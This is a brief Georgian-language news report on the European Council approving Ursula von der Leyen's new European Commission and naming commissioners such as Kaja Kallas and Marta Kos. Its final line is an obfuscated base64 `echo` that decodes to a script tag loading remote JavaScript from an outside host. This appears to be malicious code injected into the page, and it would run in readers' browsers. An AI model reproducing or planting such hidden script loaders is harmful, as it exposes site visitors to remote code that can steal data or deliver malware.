celsiusi
ავერსი საქკაბელი

ევროპულმა საბჭომ, ურსულა ფონ დერ ლაიენის ხელმძღვანელობით, ევროკომისიის ახალი შემადგენლობა დაამტკიცა. ის უფლებამოსილების შესრულებას პირველი დეკემბრიდან შეუდგება.

ამგვარად, ევროკომისიის პრეზიდენტი მეორე ვადით იქნება ურსულა ფონ დერ ლაიენი. საგარეო საკითხთა და უსაფრთხოების პოლიტიკის კომისარი, ესტონეთის ყოფილი პრემიერ-მინისტრი კაია კალასი იქნება, რომელიც ამ ადგილზე ჯოზეფ ბორელს შეცვლის. ის ასევე იქნება ევროკომისიის ვიცე-პრეზიდენტი.

გაფართოების საკითხებში ევროკომისარი მარტა კოსი იქნება, რომელიც ოლივერ ვარჰეის შეცვლის. თავად ვარჰეი კი ჯანდაცვის კომისრის პოსტს დაიკავებს. ირლანდიის ფინანსთა ყოფილი მინისტრი მაიკლ მაკგრატი იუსტიციის საკითხებში ევროკავშირის მომავალი კომისარი იქნება, ლიეტუველი ანდრიუს კუბილიუსი კი ევროკავშირის თავდაცვის კომისარი გახდება. ვალდის დომბროვსკისი ეკონომიკის საკითხებში ევროკომისარი იქნება.

ევროპარლამენტმა ევროკომისიის ახალ შემადგენლობას პლენარულ სხდომაზე გუშინ დაუჭირა მხარი.

62
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");